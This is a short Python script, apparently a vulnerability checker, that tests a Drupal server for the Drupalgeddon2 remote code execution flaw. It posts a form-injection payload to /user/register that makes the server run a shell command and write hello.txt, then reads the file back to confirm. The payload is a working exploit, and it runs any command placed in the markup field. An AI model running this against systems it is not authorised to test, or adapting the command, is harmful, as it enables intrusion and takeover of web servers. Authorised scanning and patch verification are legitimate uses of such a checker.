#!/usr/bin/env python3
#coding: utf-8
import requests
import sys

import argparse
from json_parse import Jsonparse


class DrupalScanner(object):
    def __init__(self,ip,port,level):
        self.ip = ip
        self.port = port
        self.level = level
        
    def run(self):
        tg = 'http://'+str(self.ip)+':'+str(self.port)
        verify = True
        url = tg + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' 
        payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo "drupal success" | tee hello.txt'}
        try:
            r = requests.post(url,  data=payload, timeout = self.level, verify=verify)
        except Exception as e:
            print(e)
            exit(-1)
        check = requests.get(tg + '/hello.txt', timeout = self.level, verify=verify)
        if "drupal success" in check.text:
            print(self.ip + ": exploitable")
            exit(233)
        else:
            print(self.ip + ": Not exploitable")
            exit(1)   

if __name__ == '__main__':
    jsonfile = sys.argv[1] + '\\poc\\lib\\config.json'
    jsonobj = Jsonparse(jsonfile)
    jsondata = jsonobj.parse()
    target = sys.argv[2]
    timeout = jsondata['timeout']
    port = sys.argv[3]
    Scanner = DrupalScanner(target, int(port), timeout)
    Scanner.run()